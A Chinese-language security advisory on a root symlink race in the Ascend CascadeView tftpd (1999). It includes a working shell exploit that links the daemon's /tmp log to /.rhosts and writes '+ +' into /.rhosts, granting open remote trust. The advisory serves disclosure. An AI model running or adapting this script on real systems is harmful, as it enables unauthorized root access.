Ascend CascadeView tftpd链接漏洞发布时间:1999-12-31 更新时间:1999-12-31 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Misc详细描述 Ascend CascadeView tftpd在/tmp下建立了一个叫tftpd_xfer_status.log的临时文件,如果/tmp/tftpd_xfer_status.log是一个已经存在的链接的话,它将以root权限更改链接指向的文件,入侵者可以利用它来那立诸如/.rhosts之类的文件。 测试代码 下面是它的利用代码: #!/bin/sh # # tftpserv.sh - Loneguard 07/03/99 # # Buggy tftp server shipped with CascadeView B-STDX 8000/9000 # rm /tmp/tftpd_xfer_status.log ln -s /.rhosts /tmp/tftpd_xfer_status.log echo KungFu > crazymonkey ( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1 echo "+ +" > /.rhosts 解决方案 暂无 相关信息 |
